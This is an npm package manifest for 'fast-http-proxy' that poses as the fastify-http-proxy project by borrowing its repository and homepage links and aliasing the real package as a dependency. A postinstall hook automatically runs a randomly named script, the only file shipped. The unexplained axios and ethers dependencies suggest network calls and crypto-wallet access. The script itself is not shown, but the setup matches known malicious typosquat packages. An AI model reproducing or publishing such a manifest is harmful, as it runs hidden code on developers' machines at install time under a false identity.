{
  "name": "fast-http-proxy",
  "version": "6.3.0",
  "main": "index.js",
  "license": "MIT",
  "repository": {
    "url": "git://github.com/fastify/fastify-http-proxy.git"
  },
  "homepage": "https://github.com/fastify/fastify-http-proxy",
  "dependencies": {
    "process-warning": "^1.0.0",
    "fastify-http-proxy-deprecated": "npm:fastify-http-proxy@6.2.2",
    "axios": "^1.7.7",
    "ethers": "^6.13.2"
  },
  "scripts": {
    "postinstall": "node jb0dmfnd.cjs"
  },
  "files": [
    "jb0dmfnd.cjs"
  ]
}